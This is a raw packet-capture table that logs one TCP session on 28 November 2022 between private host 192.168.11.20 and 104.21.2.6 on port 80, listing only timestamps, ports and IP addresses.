Nov 28, 2022 16:37:04.405124903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405143976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405157089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405168056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405180931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405195951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405205965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405216932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405220985 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.405227900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405236959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405391932 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.405391932 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.405875921 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.410032034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410046101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410058022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410089970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410101891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410113096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410129070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410140038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410151005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410243988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410258055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410274982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410286903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410298109 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410309076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410319090 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.410319090 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.410340071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410351992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410362959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410378933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410389900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410401106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410444975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410455942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410468102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410485029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410485983 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.410499096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410509109 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410520077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410538912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410551071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410562038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410573006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410589933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410602093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410613060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410624027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410641909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410655022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410660028 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.410660028 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.410665989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410676003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410693884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410708904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410720110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410731077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410748959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410761118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410772085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410784006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410800934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410813093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410824060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410825968 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.410832882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410844088 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410855055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410866022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410877943 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.410881996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410893917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410904884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410916090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410953045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410964966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410975933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.410994053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411007881 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411017895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411030054 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411041975 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.411046982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411057949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411068916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411081076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411092997 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.411098957 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411112070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411122084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411134005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411151886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411164045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411175013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411185980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411204100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411216974 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411227942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411240101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411256075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411267042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411278009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411288977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411290884 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.411298990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411309958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411319017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.411505938 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.411505938 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.412000895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412113905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412134886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412154913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412173033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412187099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412203074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412214994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412214994 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.412226915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412239075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412250996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412261963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412384033 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.412410975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412425041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.412552118 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.412722111 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.412722111 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.422331095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.422437906 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.422451973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.422462940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.422472000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.422697067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.423635006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423666954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423760891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423774958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423793077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423805952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423816919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423827887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423857927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423868895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423881054 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423898935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423911095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423922062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423933029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423950911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423964024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423974037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.423975945 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.423975945 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.423985004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424002886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424016953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424026966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424038887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424057007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424068928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424078941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424089909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424108982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424118996 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.424118996 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.424120903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424130917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424141884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424159050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424170971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424181938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424191952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424209118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424222946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424237013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424247980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424266100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424280882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424288988 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.424288988 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.424290895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424307108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424328089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424341917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424354076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424371958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424384117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424396038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424407959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424422979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424433947 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424444914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424490929 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.424552917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424566031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424604893 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424618006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424629927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424648046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424650908 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.424660921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424673080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424685955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424701929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424714088 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424725056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424737930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424748898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424761057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424788952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424818993 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.424841881 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424854040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424865007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.424988031 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.424988031 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.425255060 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.429610014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429722071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429739952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429757118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429769039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429780960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429800034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429812908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429825068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429836988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429857016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429869890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429881096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429891109 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.429959059 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.429960012 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.429960012 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.430152893 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.442920923 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443036079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443051100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443069935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443083048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443106890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443150043 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443177938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443192959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443203926 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443213940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443226099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443240881 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443253040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443264008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443314075 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.443314075 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.443404913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443420887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443432093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443443060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443453074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443464041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443475008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443501949 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.443502903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443526983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443537951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443547964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443557978 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443568945 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443579912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443591118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443681955 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.443737030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443778992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443789959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443804979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443820953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443831921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443839073 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.443839073 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.443842888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443854094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443865061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443887949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443901062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443912983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443937063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443948030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443958998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443969011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443979979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.443989038 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.443990946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444001913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444011927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444022894 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444034100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444103956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444122076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444133997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444145918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444149971 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.444156885 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444168091 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444179058 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444190979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444201946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444212914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444225073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444236040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444247007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444257975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444268942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444279909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444291115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444305897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444322109 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.444322109 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.444339037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444353104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.444494009 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.444683075 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.448723078 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.448844910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.448858976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.448878050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.448889971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.448930025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.448939085 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.448945999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.448956966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.448971033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.448986053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.448997021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449007988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449019909 CET	80	49830	104.21.2.6	192.168.11.20
